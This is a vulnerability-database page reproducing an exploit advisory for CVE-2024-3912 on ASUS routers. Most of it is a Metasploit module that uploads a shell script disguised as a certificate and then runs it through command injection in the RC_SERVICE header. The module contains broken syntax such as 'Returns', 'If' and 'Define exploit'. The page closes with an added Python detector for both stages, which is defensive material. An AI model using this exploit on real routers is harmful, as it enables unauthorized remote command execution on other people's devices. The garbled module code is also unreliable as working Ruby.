ASUS Router Multi-Stage Command Injection

10 Mar 2026 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news

ASUS router multi-stage injection enables code execution by uploading a script as a certificate and triggering it with a header.

Related

Reporter | Title | Published
GithubExploit | Exploit for CVE-2024-3912 | 6 Mar 2026 01:54
Circl | CVE-2024-3912 | 17 Jun 2024 09:54
CNNVD | ASUS Router Code Issue Vulnerability | 14 Jun 2024 00:00
CVE | CVE-2024-3912 | 14 Jun 2024 09:29
Cvelist | CVE-2024-3912 ASUS Router - Upload arbitrary firmware | 14 Jun 2024 09:29
EUVD | EUVD-2024-32480 | 3 Oct 2025 20:07
NVD | CVE-2024-3912 | 14 Jun 2024 10:15
Positive Technologies | PT-2024-4209 | 14 Jun 2024 00:00
The Hacker News | ASUS Patches Critical Authentication Bypass Flaw in Multiple Router Models | 17 Jun 2024 14:39
Vulnrichment | CVE-2024-3912 ASUS Router - Upload arbitrary firmware | 14 Jun 2024 09:29

=============================================================================================================================================
    | # Title     : Asus router Multi‑Stage Command Injection via SETROOTCERTIFICATE Leading to Remote Command Execution                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://router.asus.com/                                                                                                    |
    =============================================================================================================================================
    
    [+] Summary    : A multi-stage command injection vulnerability (CVE-2024-3912) allows an attacker to achieve remote command execution on a vulnerable device by abusing the SETROOTCERTIFICATE and APPLYAPP HTTP methods.
                     In the first stage, a malicious shell script disguised as a certificate file is uploaded to the target system through the SETROOTCERTIFICATE request.
                     The uploaded content is written to the filesystem, where it can later be executed. In the second stage, the attacker triggers command execution by injecting
                     a shell command into the RC_SERVICE header of the APPLYAPP request, which executes the previously uploaded script.
                     Successful exploitation results in arbitrary command execution with the privileges of the affected service.
    			  
    [+] POC   : 
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
    
    Rank = ExcellentRanking
    
    include Msf::Exploit::Remote::HttpClient
    
    def initialize(info = {})
    super(update_info(info,
    'Name' => 'Multi-Stage Command Injection Exploit (SETROOTCERTIFICATE)',
    'Description' => %q{
    This module exploits a multi-stage command injection vulnerability.
    Stage 1: Loads a script disguised as a certificate.
    
    Stage 2: Executes the script via RC_SERVICE command injection.
    
    },
    'Author' => [ 'indoushka' ],
    
    'License' => MSF_LICENSE,
    
    'Platform' => 'unix',
    
    'Arch' => ARCH_CMD,
    
    'Targets' => [ ['Generic Device', {}] ],
    
    'DefaultTarget' => 0,
    
    'DisclosureDate' => '2026-03-07'
    ))
    
    register_options(
    [
    Opt::RPORT(443),
    OptBool.new('SSL', [true, 'Use SSL/TLS', true])
    
    ]
    
    )
    end
    
    def check
    print_status("Checking the target's response...")
    
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, '/')
    
    })
    
    Returns CheckCode::Unknown unless res
    
    If res.code == 200
    
    Returns CheckCode::Detected
    End
    
    CheckCode::Safe
    End
    
    Define exploit
    
    payload_body = <<~XML
    
    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    
    <content>
    
    <key>-----Beginning of private RSA key-----id</key>
    
    <cert><![CDATA[
    
    #!/bin/sh
    #{payload.encoded}
    
    ]]></cert>
    
    <intermediate_crt>-----Beginning of certificate-----</intermediate_crt>
    
    </content>
    
    XML
    
    print_status("Phase 1: Load payload via SETROOTCERTIFICATE")
    
    res = send_request_cgi({
    'method' => 'SETROOTCERTIFICATE',
    
    'uri' => normalize_uri(target_uri.path, '/favicon.ico/'),
    
    'data' => payload_body
    
    }, 20)
    
    unless res
    fail_with(Failure::Unreachable, "No response received from target")
    
    end
    
    print_good("Payload complete")
    
    Rex.sleep(1)
    
    print_status("Phase 2: Starting execution via APPLYAPP")
    
    res = send_request_cgi({
    'method' => 'APPLYAPP',
    
    uri' => normalize_uri(target_uri.path, '/favicon.ico/'),
    
    'headers' =>
    
    {
    'ACTION_MODE' => 'apply',
    
    'SET_NVRAM' => 'aa',
    
    'RC_SERVICE' => '`sh /etc/cert.pem.1`'
    
    }
    }, 20)
    
    unless res
    
    fail_with(Failure::Unreachable, "No response received during execution")
    end
    
    print_good("Exploitation request sent successfully")
    end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
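
A defender-side check for the two-stage pattern described in the summary, as an added example that is not part of the original advisory or of any ASUS or Metasploit code: it parses captured HTTP requests, flags the SETROOTCERTIFICATE and APPLYAPP methods, a certificate body that is not PEM, and shell metacharacters in RC_SERVICE, then correlates both stages per source address. The function names, trait labels and sample requests are constructed for illustration.

```python
import re
# Method and header names come from the advisory; everything else is illustrative.
STAGE1, STAGE2 = "SETROOTCERTIFICATE", "APPLYAPP"
SHELL_META = re.compile(r"[`$;|&<>\r\n]")          # characters that reach a shell
PEM_BEGIN = re.compile(r"-----BEGIN [A-Z0-9 ]+-----")

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    pairs = (line.partition(":") for line in lines[1:])
    headers = {name.strip().upper(): value.strip() for name, _, value in pairs}
    return lines[0].split(" ", 1)[0], headers, body

def classify(raw):
    """Return the set of suspicious traits found in one request."""
    method, headers, body = parse_request(raw)
    traits = set()
    if method == STAGE1:
        traits.add("stage1-method")
        m = re.search(r"<cert>(?:<!\[CDATA\[)?(.*?)(?:\]\]>)?</cert>", body, re.S)
        cert = m.group(1).strip() if m else ""
        # A real certificate is PEM text; a shebang or missing PEM header is not.
        if cert.startswith("#!") or not PEM_BEGIN.search(cert):
            traits.add("cert-not-pem")
    elif method == STAGE2:
        traits.add("stage2-method")
    if SHELL_META.search(headers.get("RC_SERVICE", "")):
        traits.add("rc-service-shell-meta")
    return traits

def correlate(events):
    """Alert on sources that send stage 1 and later stage 2; events are (ip, raw)."""
    staged, alerts = set(), []
    for src, raw in events:
        traits = classify(raw)
        if "stage1-method" in traits:
            staged.add(src)
        if "stage2-method" in traits and src in staged:
            alerts.append((src, sorted(traits)))
    return alerts

# Constructed sample traffic (documentation IP ranges, harmless script body).
UPLOAD = ("SETROOTCERTIFICATE /favicon.ico/ HTTP/1.1\r\nHost: router\r\n\r\n"
          "<content><cert><![CDATA[\n#!/bin/sh\necho sample\n]]></cert></content>")
TRIGGER = ("APPLYAPP /favicon.ico/ HTTP/1.1\r\nHost: router\r\n"
           "RC_SERVICE: `sh /etc/cert.pem.1`\r\n\r\n")
BENIGN = "GET /index.asp HTTP/1.1\r\nHost: router\r\n\r\n"
EVENTS = [("198.51.100.7", UPLOAD), ("203.0.113.9", BENIGN), ("198.51.100.7", TRIGGER)]
```

Calling `correlate(EVENTS)` returns one alert for the source that sent both stages; a reverse proxy or IDS in front of the management interface can apply the same per-request traits to reject either method outright.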

10 Mar 2026 00:00 (current)
Vulners AI Score: 6.3 (Medium risk)
CVSS 3.1: 9.8
EPSS: 0.02093